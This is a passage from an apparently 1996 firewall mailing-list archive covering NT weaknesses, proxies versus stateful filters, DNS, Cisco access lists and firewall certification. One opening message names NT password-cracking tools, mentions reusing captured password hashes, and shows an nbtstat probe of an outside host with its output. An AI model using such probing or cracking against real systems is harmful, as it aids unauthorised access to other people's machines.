encrypted string in the SAM database. This being a constant can be captured and reused. NT password crackers: ScanNT - http://www.omna.com/yes/andybaron/scannt.htm Kane also cracks NT - http://www.intrusion.com/ksant.htm (Very good security reports on NT users/permissions/integrity) I think both need to run on NT, and target a host or domain. 5. NT Server accepts connections without domain entries (WFW compatibility), and passwords in DES vs. RSA encryption (Lan Manager compatibility), security is compromised by the lowest common denominator: WFW and Lan Manager compatibility. Comment: Ref: http://www.microsoft.com/kb/bussys/winnt/q102716.htm Also, browse your systems' registry (95/NT) from a remote webserver: http://dev1.ora.com/andcgi/wregcgi.exe This one might make you want to unplug your Internet feed! If you know of a webserver running NT, try this from in front of your firewall, using 95 or NT: C:\> nbtstat -A 198.105.232.1 #(ftp.microsoft.com) NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- FTP <00> UNIQUE Registered INETSERVERS <00> GROUP Registered FTP <20> UNIQUE Registered INETSERVERS <1C> GROUP Registered FTP <03> UNIQUE Registered INETSERVERS <1E> GROUP Registered _SERVICE <03> UNIQUE Registered INet~Services <1C> GROUP Registered IS~FTP.........<00> UNIQUE Registered FTP <01> UNIQUE Registered MAC Address = 08-00-2B-A3-77-EC Just like finger, but better. --!> I would appreciate someone setting me straight on these. For example, if there were a way to turn off Lan Manager compatibility (DES) and accept only RSA passwords, I would appreciate it. Also, it would be nice to enforce domain entries in the connection string (I only run NT Clients). I suppose I could also remove the floppies from the servers, since I load all software with CDs. Since C2 certification was granted only with network connections disabled, there must be good reason for this. Bill Stout <=======10========20========30========40========50========60========70========80 William B. Stout | Major revelations: Senior Systems Admin | "All objects are part of a larger object." Hitachi Data Systems | "3 aware beings comprise a person; mind, body, spirit." NT/UNIX/I-net/Routers | "The secret of life: To be involved with 'creation'." 408-970-4822 | Disclaimer: I speak for no one but us three people. ;) -------------------------------------------------------------------------------- From firewalls-owner Mon Jul 1 16:50:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA17014 for firewalls-outgoing; Mon, 1 Jul 1996 16:45:09 -0700 (PDT) Received: from ihgw1.att.com (ihgw1.att.com [207.19.48.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id QAA16991 for ; Mon, 1 Jul 1996 16:44:59 -0700 (PDT) From: rls@neptune.att.com Received: by ihig1.att.att.com (SMI-8.6/EMS-1.2 sol2) Original-From: neptune!rls Message-Id: <199607012344.SAA29664@ihig1.att.att.com> Subject: Re: How good is "stateful inspection"? (fwd) To: michael@memra.com (Michael Dillon) Date: Mon, 1 Jul 1996 19:18:10 -0400 (EDT) Original-From: Ronald L. Sharp Cc: firewalls@greatcircle.com In-Reply-To: from "Michael Dillon" at Jun 30, 96 03:16:43 pm X-Mailer: ELM [version 2.4 PL17] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michael, you win the prize. This is exactly what I was speaking about. Most answers were concerned about the proxy knowing the buffer sizes of the internal hosts. However, what I have seen from my limited breath of experience with proxies acrossed platforms is that there are common buffer sizes for protocol elements. This is either by standard or by convention. Like much of Unix, network apps such as finger have common roots and so they will may have the common buffer sizes. The discussion now can get down to "no they don't" and "yes they do" but I would rather not. I was just bringing up one example of a possible natural protection provided by proxies that you may not find in an SPF. By their nature proxies actually parse and process the protocol data (to some extent) and this may cause some attacks to be stopped by the proxy. For those who said they feel this is more an end host problem. I am a stong advocate for security in depth and I say provide levels of security wherever you can. Thanks to everyone who participated in this discussion. If there are examples of other natural protections offered by proxies I would be interested to hear of them. > > On Sun, 30 Jun 1996, Darren Reed wrote: > > > > The person who posted the question was under the impression that SPF couldn't > > > but proxies could. I believe that neither can effectivly protect from that > > > type of attack, > > > because it requires very specific knowledge about the platform in question on > > > the > > > inside. > > > But, in both cases, you must somehow put the knowledge about what is good > > and bad in the proxy/filter code. > > > > It doesn't require any knowledge about the interior platforms which it is > > attempting to protect. > > All of this discussion about buffer overruns seems to be skirting the > issue. > > A. many protocols have defined maximum lengths for various fields > transferred within those protocols. > > B. Often implementors of a protocol inadvertently expose their products to > misuse by not checking those maximums. > > C. Often hackers break into servers by means of exploiting a buffer > overrun in a flawed server application. > > D. There is no technical reason why a firewall proxy could not examine > the data flowing through it and ensure that all fields are within the > maximums defined for the protocol by truncating the field and logging > the event. > > E. I don't know enough about stateful packet filters but they may be able > to do the same as proxies. > > F. If we assume that the applications server has been proven to operate > correctly within the protocol specification by running some sort of > test suite (a rather common occurence these days) then the proxy would > provide a greatly reduced level of risk by preventing these buffer > overrun attacks. > > G. Nothing is perfect, the solution I propose is certainly not perfect, > but I think it moves in the right direction and does not increase > any security risks or negatively impact the operation of the firewalls > or the applications. > > > Michael Dillon ISP & Internet Consulting > Memra Software Inc. Fax: +1-604-546-3049 > http://www.memra.com E-mail: michael@memra.com > > > -- Ron Sharp Internet address: r.l.sharp@att.com From firewalls-owner Mon Jul 1 17:22:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA18203 for firewalls-outgoing; Mon, 1 Jul 1996 17:09:10 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA18196 for ; Mon, 1 Jul 1996 17:09:02 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607020006.AA29551@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: firewalls From: Ryan.Russell/SYBASE Date: 1 Jul 96 17:07:11 EDT Subject: Re:Stateful Packet Screens Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hmm.. I don't know about the CC line... sigh, the joys of Notes mail. Frequently the mail gets there even if it chews the header. You're not the first to complain about my mail. Anyway, in response to your response: Yes, I allow any app initiated from the inside. (At least, any that will work with the FW, I only occasionally go out of my way to make one work that doesn't automatically.) I don't consider this to be significantly less secure than a connection with limited allowed apps. My users are just as capable of hosing themselves with telnet/http/ftp as with any other new toy. As I mentioned before, the users would find a way around you. At least I can log what they are up to, and go back if I find something nasty has toasted someone's machine. I suppose the worst case (since my FW doesn't allow incoming, like just about any FW) would be that some app, likely a Web thingy, would do some trojan stuff, and initiate a connection out from the inside. A proxy would allow that just as easily. And yes, of course I would deny based on port. There is nothing else to base a decision about service type on. Say you only allow telnet out... I do a telnet x.x.x.x 80 or 25. Am I running telnet, or am I running HTTP or SMTP? Do you have a proxy firewall in place? Do you have users? Don't they complain about not being able to use Realaudio? Ryan ---------- Previous Message ---------- To: Ryan.Russell cc: From: peter @ baileynm.com (Peter da Silva) @ smtp Date: 07/01/96 06:03:22 PM Subject: Re: Stateful Packet Screens > To: Peter da Silva > Cc: firewalls ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Are your messages getting to the list? I'll just reply to you. > Why "low security" end of the spectrum? Because SPF > tends to support more app types? I don't believe in > restricting the kind of data that users can access a > reasonable form of security. I call letting any application through by default without evaluating it for security "low security". And with a stateful packet filter, I don't see how you can do anything else without a lot of very complex rules. > And, it's quite easy for me to deny a particular > service should I choose to. OK, how would you set up a default-off environment with a staeful packet filter, based on protocols (and bearing in mind that destination port isn't really adequate, since a bandit application could listen to any port)? From firewalls-owner Mon Jul 1 17:53:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA21912 for firewalls-outgoing; Mon, 1 Jul 1996 17:47:21 -0700 (PDT) Received: from po.dbs.com.sg ([203.120.44.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA21903 for ; Mon, 1 Jul 1996 17:47:14 -0700 (PDT) Received: from dbs.com.sg by po.dbs.com.sg (SMI-8.6/SMI-SVR4) Received: from T1#u#DM1-Message_Server by dbs.com.sg Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 02 Jul 1996 08:32:52 +0800 From: Chin Cheng Baey To: firewalls@GreatCircle.COM Subject: SENDING BIG FILES THRU INTERNET Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 1. Am not sure whether this question should be posted to this group. If I'm wrong, my apologies for taking up your bandwidth. Hope someone can point me in the right direction. 2. I'm toying with the idea of sending encrypted files (probably DES or DES-derivative type encryption or maybe even RSA) thru the Internet to counterparts overseas. The size of the files may hit 4-5 mb. 3. Noticed that when big files are sent thru the Internet, it gets chopped up into smaller parts. Am not sure whether this is done by the sender or the Internet provider. For encrypted files, this may pose a problem because the receipient may not be able to assemble the files back for decryption. 4. Would be grateful if someone could advise whether my concerns are valid. Are there any ways to get around the problem. 5. Many thanks in advance for all your kind advice. From firewalls-owner Mon Jul 1 18:52:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA25354 for firewalls-outgoing; Mon, 1 Jul 1996 18:25:06 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id SAA25346 for firewalls@greatcircle.com; Mon, 1 Jul 1996 18:25:02 -0700 (PDT) Received: from gate.ggr.co.uk (gate.ggr.co.uk [193.128.25.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA06185 for ; Mon, 1 Jul 1996 04:06:03 -0700 (PDT) Received: from mailhub.ggr.co.uk (uk0x07.ggr.co.uk [147.184.146.69]) by gate.ggr.co.uk; Mon, 1 Jul 1996 12:01:32 +0100 (BST) Received: from ukwit01.ggr.co.uk (ukwit01.ggr.co.uk [147.184.219.175]) by mailhub.ggr.co.uk; Mon, 1 Jul 1996 11:54:27 +0100 (BST) Received: by ukwit01.ggr.co.uk (8.7.5/imd160294) From: "Lack Mr G M" Message-Id: <9607011204.ZM4779@ukwit01> Date: Mon, 1 Jul 1996 12:04:17 +0100 In-Reply-To: Dan Shadix References: <01BB645B.80CF6E60@gccs25.gccs.cpf.navy.mil> X-Mailer: Z-Mail (3.2.0 26oct94 MediaMail) To: Dan Shadix Subject: Re: split-brain DNS Cc: "'Firewalls@GreatCircle.COM'" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Why can't you make the one master DNS server secondary for all your internal sub-domains? Then if a request is for a domain for which it is authoritative, it will just respond, if not then it will go to the Internet at large. Whereas this might work (ie. it sounds as though it will, but I haven't thought it through completely) this would leave me with the master server being authoratative for everything. This would push the size of its database up from ca. 8000 to ca. 40000 entries (guessing here, but of that order). I don't have the memory on the servers for such numbers. Also, it strikes me as being against the "spirit" of DNS. Relatively few queries go "between" domains, so I don't want this master server to spend a lot of its time doing zone queries for timestamps and frequent zone transfers just for these. I just want to send the query off to the relevant server, just as in the "full" InterNET. A logical extension of your solution would be to get all of the root name servers to become secondaries for all domains, and I'm sure that we can agree that would be a disaster! > Not sure that the problem described is the one I have, but there is no way > for this to work if you have multiple private domains (ie. not just > sub-domains). You can get all of these to forward to an internal master, but > you can't get this master to forward the relevant queries back to the internal > domains (as you can't "prime" the cache with non-root servers). So the > internal master asks the real root servers about your internal domains and > beleives that they do not exist. The result is that you can't resolve one > internal domain from another. > > Now, even if you do have a single domain with sub-domains it is quite likley > that the *reverse lookup* domains are separate, so you have the problem then > anyway. > > I have had to use a modified version of 4.9.3B9 which, basically, does allow > me to prime the cache with internal name servers. -- ----------- Gordon Lack ----------------- gml4410@ggr.co.uk ------------ The contents of this message *may* reflect my personal opinion. They are *not* intended to reflect those of my employer, or anyone else. From firewalls-owner Mon Jul 1 18:53:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA27126 for firewalls-outgoing; Mon, 1 Jul 1996 18:42:15 -0700 (PDT) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id SAA27101 for ; Mon, 1 Jul 1996 18:42:05 -0700 (PDT) Received: from explorer2.clark.net (mjr@explorer2.clark.net [168.143.0.5]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id VAA24901 for ; Mon, 1 Jul 1996 21:39:19 -0400 (EDT) From: "Marcus J. Ranum" Received: (from mjr@localhost) by explorer2.clark.net (8.7.1/8.7.1) id VAA27764 for Firewalls@GreatCircle.COM; Mon, 1 Jul 1996 21:39:18 -0400 (EDT) Message-Id: <199607020139.VAA27764@explorer2.clark.net> Subject: Re: Catapault firewall To: Firewalls@GreatCircle.COM Date: Mon, 1 Jul 1996 21:39:17 -0400 (EDT) In-Reply-To: <199607011943.MAA27578@miles.greatcircle.com> from "Firewalls-Digest" at Jul 1, 96 12:43:30 pm Reply-To: mjr@v-one.com Organization: V-One Corporation, Baltimore, MD Office Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I pulled down Microsoft's page on Catapult. I urge you all to do so and give it a read. From where I sit, it looks like the firewall market has reached its next level, with this announcement. The brief on Microsoft's page is completely content-free. Several times, Catapult is recommended as the solution because it's secure. Nothing about why it's secure or how it's secure. Don't bother your head with that stuff! It's SECURE, OK? ...Or at least as secure as a beta product that only runs on a beta version of NT can be. In fairness to Microsoft, it may be pretty good stuff. But we can't tell from what they say. Which is why I feel it marks a milestone in the firewall market. The Big Boys Are Here now and it's SECURE, it's OK. That argument worked for Netscape, for a while. Those of us who've been with this firewall thing for a while have seen the market get muddied before, and eventually things calm down again. It'll be fascinating to see what happens if Microsoft decides to put even a teeny bit of their marketing muscle behind Catapult. I guess it means that, as a technology, firewalls have "arrived." mjr. From firewalls-owner Mon Jul 1 19:04:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA24852 for firewalls-outgoing; Mon, 1 Jul 1996 18:19:42 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id SAA24842 for firewalls@greatcircle.com; Mon, 1 Jul 1996 18:19:38 -0700 (PDT) Received: from hippo.ru.ac.za (hippo.ru.ac.za [146.231.128.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id BAA12959 for ; Sun, 30 Jun 1996 01:23:11 -0700 (PDT) Received: by hippo.ru.ac.za (Smail3.1.29.1 #1) Message-Id: From: ccfj@hippo.ru.ac.za (F. Jacot Guillarmod) Subject: Help with cisco access list? To: firewalls@greatcircle.com Date: Sun, 30 Jun 1996 10:20:16 +0200 (GMT+0200) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, A query on Cisco access lists... I've had a set of access lists configured and working for a while now, but the manual maintenance has become a bit confusing, so I've set up the acl-examples perl scripts by Paul Traina available from ftp.cisco.com, and am trying to use them in conjunction with other tools we use to automate the maintenance of our DNS. It looks like most of the chickens mentioned in the Chapman paper on IP packet filtering have come home to roost in a big way. The manual lists, which still work OK, probably work because they're next to useless. The automated lists generated by the "netsec" perl script have tightened things up so much that I'm forced to admit to being confused about parts of what I'm trying to achieve and how to achieve it. A search through what literature is available to me didn't bring up a whole lot of practical info on setting up access lists, so I'd be grateful for any further pointers or examples (other than those in the Cisco manuals, which tend to be somewhat ....). Anyway, here's the scenario: We have a 2514 running 10.0 and are using all 4 interfaces. Being a university, it's assumed brainpower is more plentiful than money in achieving workable solutions. We try. ISP #1 + Internet ISP #2 + Regional net -------------------- --------------------- | | | | -------------------------- | s0 s1 | | | | | | | | e0 e1 | -------------------------- | | | | -------------------- --------------------- Admin subnet Everyone else subnets A.B.16.0/255.255.248.0 A.B.128.0/255.255.248.0 A.B.64.0 A.B.192.0 etc The access lists for ether 1 are pretty standard and straightforward, as are those for serial 0 and serial 1 (which are currently identical). i.e. in isolation they work just fine and I understand them. The awkward one is the access list for ether 0, which contains admin telnet and print servers plus a large number of workstations. The type of access needed here is: Out onto ether 0: a Telnet from selected hosts outside of A.B.16.0 but inside A.B.0.0 b FTP from selected hosts outside of A.B.16.0 but inside A.B.0.0 c Printing from hosts outside of A.B.16.0 but inside A.B.0.0 d "Established" tcp services, such as WWW etc from anywhere. Out onto ether 1: e Printing from hosts in A.B.16.0 but nowhere else f Bootp from workstations within A.B.16.0 but nowhere else g The "usual" paranoid stuff, excluding UDP other than port 53. I've got most of this working, except for items c and e, printing using the BSD print spooler, which does things I can't grasp. So, to get past this misunderstanding, I've thrown caution to the winds and tried permitting all UDP between ether 0 and ether 1 but I still can't print anything. Can anyone point me in the right direction? Or explain what on earth lpr/lpd get up to when they start exchanging packets? Is there anything else to worry about (within reason) accessing admin type networks? Many thanks, -- F.F. Jacot Guillarmod - Computing Services - Rhodes University - Grahamstown Internet: ccfj@hippo.ru.ac.za Phone: +27 461 318284 Fax: +27 461 25049 The views expressed above are not necessarily those of Rhodes University From firewalls-owner Mon Jul 1 19:21:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA24733 for firewalls-outgoing; Mon, 1 Jul 1996 18:18:43 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id SAA24707 for firewalls@greatcircle.com; Mon, 1 Jul 1996 18:18:31 -0700 (PDT) Received: from typhoon.dial.pipex.net (typhoon.dial.pipex.net [158.43.128.46]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA22873 for ; Sat, 29 Jun 1996 04:13:00 -0700 (PDT) Received: from unknown by typhoon.dial.pipex.net (8.7.4/) Message-ID: In-Reply-To: References: Conversation with last message To: firewalls@GreatCircle.COM MIME-Version: 1.0 From: Ian Johnstone-Bryden Subject: Re: NCSA Certification Date: Sat, 29 Jun 96 12:23:14 GMT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Corey wrote: > To all: > > I think some important important questions need to asked: > > 1. Who appointed the NCSA as the proper body to approve firewalls? > > 2. Do people realize that in order to be approved, a vendor must be a > member of the NCSA? > > 3. Do people realize that the first vendors approved were all members of > the NCSA and as such got a timing advantage over other non-members? > > 4. Is it fair that all vendors, irrespective of size, must first pay a > $22,000 membership fee? > > 5. Will the NCSA put a footnote on their "approved" list that only those > vendors willing to pay $22,000 have received the NCSA's approval? > > 6. Doesn't the "bundled" concept of membership and qualification for > approval render whole process meaningless? > > 7. Have any members of NCSA not been approved? > > 8. What is NCSA doing with the funds received by its members? Is NCSA a > non-profit organization? > > I believe all of these questions need to be addressed before the NCSA holds > itdself out as the self-appointed arbiter of firewall quality assurance. > > Just one man's opinion > All very good questions. As most subscribers to this list will be well aware, we were not short of evaluation bodies in the first place. So far no one has come up with a perfect evaluation system and probably never will, so it comes down to deciding what risks each buyer is prepared to take. TCSEC/'Orange Book' NCSC still evaluates product in the national (US) interest. The evaluation has been free to the vendor but its still cost a great deal of money. The vendor has to hire a VSA who has passed the NCSC VSA training and examination system. Considerable work has to be done during an evaluation to provide the system (hardware and software) and deal with the questions and give the presentations necessary to support the NCSC evaluators. The benefit of an NCSC certificate is that NCSC does not evaluate in the vendors' interests and are a government controlled and funded agency specifically established to be independent of vendor interest. The risks of NCSC evaluation are several: 1. The process is slow and this means that the product is becoming obsolete by the time the evaluation is complete. 2. The RAMP (rating maintenance programme) is also slow and cumbersome so that the product available for delivery with a certificate is much older than the latest version in vendor development. 3. The evaluation primarily covers assurance and not integrity or availability. 4. The evaluation and certificate covers a system down to fine detail like printer cables and much of that hardware will no longer be standard production by the time the evaluation is complete. 5. The vendor jacks up the product price to reflect the cost of development and evaluation support and because the product enjoys some monopoly or quazi monopoly status through rarity of certificates. 6. TCSEC uses an incorrect model for the development processes employed by vendors. 7. Rainbow Series is based strongly on Mil-Std 2167A which assumes a detailed customer specification and custom engineering to meet that specification. 8. The system doesnt allow for sub-system certification other than you can have an evaluation which results in a D level ticket which is also issued to failed products. 9. Even today an NCSC evaluated product may not be available to all users, even inside the US. End-user certificates may still be required before legal shipment. ITSEC European Governments recognised the weaknesses and strengths of the US process and 4 countries worked together to produce ITSEC. ITSEC has several benefits over the US NCSC system: 1. Any number of Commercial Licensed Evaluation Facilities can be licensed. The UK ITSEC Scheme Body has already licensed 8 CLEFs (2 are US owned subsidiaries). The German ITSEC Scheme Body is planning to license additional CLEFs, possibly up to 120. France is planning to introduce a CLEF system with somewhere between the UK and German licensing numbers. That removes a major delay cause present in the US system where NCSC just doesnt have the manpower to handle even the relatively small number of products in the queue. 2. ITSEC certificates in the UK and Germany are mutually recognised by an agreement between the 2 national schemes and other countries are due to sign agreements this year in Europe and other areas. 3. Any vendor can present product for evaluation. 4. Any user can buy certified product - not just specialised government agencies. 5. ITSEC measures Integrity and Availability as well as measuring Assurance. 6. Software testing can be generic. Therefore a firewall mounted on an Intel-based platform and a specific trusted OS can be certified as meeting a particular TOE on any Intel platform which has a certified OS. ITSEC also has risks: 1. The CLEFs do not issue licenses, only evaluation reports. Certification is by the government run national ITSEC Scheme Bodies. Therefore the system is only as good as the policing by the Scheme Bodies who are able to place export and distribution controls on some products. 2. Although ITSEC is significantly faster than the NCSC system, its still slow and still leads to obsolete product. 3. Generic platform certificates for software do introduce risk because clone hardware may have vulnerabilities which were not present in the model and manufacture of the hardware supplied as a base for evaluation (this also applies to any platform component like the OS). 4. CLEF evaluation fees can be extortionate. ***BEFORE a CLEF objects to that statement, I would qualify it. A small product which takes one month to develop and document for evaluation can take a year to evaluate at a high day rate. Charges are proportionately more realistic as the product complexity increases. 5. There is not an established formal RAMP system and review of new versions can be erratic across a number of products. 6. Some vendors with very good products cannot justify evaluation costs and therefore a certified product is not necessarily the best solution available. Thats particularly true as long as ITSEC evaluations are in Europe and much product development is somewhere else. A vendor (for example a US vendor) who has perhaps 20 years experience of providing trusted solutions and who has already had successfull NCSC evaluations still has to undergo a development assurance inspection. If he happens to be based in a pleasant geographic area, some CLEFs may feel that its necessary to send a small team over for several weeks to review design processes, staying in the best hotels and charging a high day rate. This is still not a proportionally high cost, provided that the vendor is submitting many products over a period, because the inspection is for once only. That may be another risk because the vendor might not employ the same methods later on. Common Criteria This has yet to go into full operation and so the effects are potentially unknown. However, it is based heavily on ITSEC so it is reasonable to expect similar benefits and risks. Provided many countries sign mutual acceptance and evaluation agreements like the ITSEC agreements, CC will really become the international system. The main risk may then be that not every Scheme Body may really work as agreed and national interests may intrude. ITSEC for example lost several benefits and introduced extra risk because Europe tried very hard to accomodate the national interests of other countries in an attempt to develop a true ISO style international criteria. Self Certification. Vendors will offer self certified and 'designed to meet' products. Some vendors may be very correct and open while others will offer only a marketing view of product achievements. Potentially this is very high risk unless the vendor claims are nailed down firmly in the procurement document and you can afford to take them through the courts if necessary. Even then its still risky. Self Evaluation with Test Suites US NIST and UK NPL have both offered dial-in test suite facilities including C2 test suites. I dont believe either service has attracted many vendors and probably the benefits over self certification are minimal. There are a growing number of test suites available for network security and some of these could be used by vendors and customers alike. That does of course assume that both are capable of driving them and being hoest about the results. There is also the question of how up to date and effective the test suites are. Like penetration testing, the result may mean something or nothing. Reality of systems In the end, product testing is only a small part of the total equation in risk management. When TCSEC and ITSEC were established, there were two goals: 1. Force vendors to present adequately documented product with identified Security Targets. 2. Make project procurement easier by removing some unnecessary risks. Neither system is a destination for governments, the destination is accreditation and enforcement. Unfortunately, buying certified product to build a system doesnt mean the system achieves the same level, and vulnerabilities can be introduced during integration and implementation. Accreditation doesnt work unless you first produce a detailed risk policy to provide something against which you can measure vulnerabilities and decide which vulnerabilities have to be removed and which are acceptable risks for YOUR business. Accreditation means very little unless you have the means to enforce your risk policy. There are no short cuts. As far as NCSA Certification goes, only experience will show if its worth anything. Any trade club is vulnerable to vested interest and all the certificate might show is that a particular vendor has paid the membership fee. OTOH it can be a huge benefit to the first vendors to join because it provides their marketeers with something else to hype their products. That advantage reduces as more vendors join the club and might become worthless if some products with certificates are shown later to have severe vulnerabilities. Ian J-B. From firewalls-owner Mon Jul 1 19:58:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA02524 for firewalls-outgoing; Mon, 1 Jul 1996 19:29:30 -0700 (PDT) Received: from apu.rcp.net.pe (apu.rcp.net.pe [161.132.5.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA02516 for ; Mon, 1 Jul 1996 19:29:22 -0700 (PDT) Received: by apu.rcp.net.pe Message-Id: From: vadillo@apu.rcp.net.pe (Enrique Vadillo) Subject: /etc/shadow encryption To: firewalls@GreatCircle.COM Date: Mon, 1 Jul 1996 21:25:45 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello all! I would like to know if you know where i can get the encryption algorythm that Sun Solaris 2.5 uses to write its /etc/shadow file. I am trying to write some proggy that can let me create users thru email, i have so many by day!! i want to make this an automated process, and all i need now is to know the way this encryption is made. Thanks in advance, -- Enrique Vadillo Research & Development at RCP http://www.rcp.net.pe fax : +51 1 241-1320 Peruvian Internet Gateway work: +51 1 954-4799 From firewalls-owner Mon Jul 1 20:19:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA07086 for firewalls-outgoing; Mon, 1 Jul 1996 20:06:07 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id UAA07073 for ; Mon, 1 Jul 1996 20:05:59 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB67A0.E5768A40@rwcooper.rc.toronto.on.ca> From: Russ To: "Firewalls@GreatCircle.COM" Subject: RE: Catapault firewall Date: Mon, 1 Jul 1996 22:59:00 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus, as always your wit is fine tuned...;-] In fairness to Microsoft, the Catapult download includes over 600kb of HTML documentation explaining, in more detail than most would expect, about how it, and the Remote Winsock Service, work. The marketing dribble in the press release is definitely targeted at non-techno Purchasing Managers, certainly not security folks. Whether or not it actually represents a "new age" in Firewalls is going to be completely dependent on its actually security, and its cost; - First, it has to work according to the documentation, if it doesn't, or can't be proven, then it should be spurned like any other half-baked piece of code. - If its priced competitively with other products (like Raptor or Firewall-1), then I doubt it will be broadly accepted, people will just continue to buy their complete package from security companies. OTOH, if its cheap, then it may be the foundation on which other products are added. This could represent something new, and significant. Particularly if you get wide acceptance of PPTP. Anyway, back to my testing...;-] Cheers, Russ From firewalls-owner Mon Jul 1 20:34:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA25920 for firewalls-outgoing; Mon, 1 Jul 1996 18:30:42 -0700 (PDT) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id SAA25899 for ; Mon, 1 Jul 1996 18:30:29 -0700 (PDT) Received: from explorer2.clark.net (mjr@explorer2.clark.net [168.143.0.5]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id VAA22630 for ; Mon, 1 Jul 1996 21:27:47 -0400 (EDT) From: "Marcus J. Ranum" Received: (from mjr@localhost) by explorer2.clark.net (8.7.1/8.7.1) id VAA26749 for firewalls@greatcircle.com; Mon, 1 Jul 1996 21:27:45 -0400 (EDT) Message-Id: <199607020127.VAA26749@explorer2.clark.net> Subject: firewall certification (was Re: NCSA) To: firewalls@greatcircle.com Date: Mon, 1 Jul 1996 21:27:45 -0400 (EDT) Reply-To: mjr@v-one.com Organization: V-One Corporation, Baltimore, MD Office Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [This is no longer particularly related to NCSA, so it should not be taken as criticism or praise for their business.] I'm very cynical about the whole notion of firewall certification, as many of you have noted. Mostly, it's because it's nearly impossible to find an unbiassed source. For example, the federal government's various agencies have several times tried to publish firewall recommendations but whenever they do, they get slammed and threatened with lawsuits by the vendors that feel they are slighted. There are probably all kinds of goofy procurement rules that further tie the hands of government agencies, with respect to making comments. NSA, for example, has spent a lot of effort looking at firewalls. I know this for a fact, and I'm doubly frustrated by the fact that they don't say much. On one hand, it's about unclassified stuff, and WE PAID FOR IT - but - I suspect that the hassle they'd get from the vendors simply isn't worth it. I was involved in one case where NSA looked at a firewall that I built, but I was never formally told the results because they were CLASSIFIED. Hell, don't tell the author! NCSA's situation is different: they have customers who are paying them for a service. As with any service providing business, there's a transfer of power of position along with the transfer of money. I believe that with firewalls, NCSA's stated plan was to start with fairly basic tests that verified a reasonably simple baseline, and then to "raise the bar" over time. They certainly could not set the bar too high right away or they'd scare their customers (the vendors) off. I can accept that some of what NCSA's doing has value, by interpreting it as an extended marketing effort by the vendors, with NCSA as a mouthpiece that makes sure the claims aren't too egregious. That's a *START*. A tiny one. To do product reviews, I believe the only people who are qualified are the ones who are beholden to none, and who have a history (in theory) of resisting censorship. By that, I mean The Fourth Estate. Unfortunately, from the quality of a few of the firewall evaluations, it is clear that not all members of the press take their responsibility very seriously: I've seen firewall "reviews" that crib marketing copy verbatim. I continue to advocate that people EDUCATE THEMSELVES rather than take someone else's opinion in someone else's 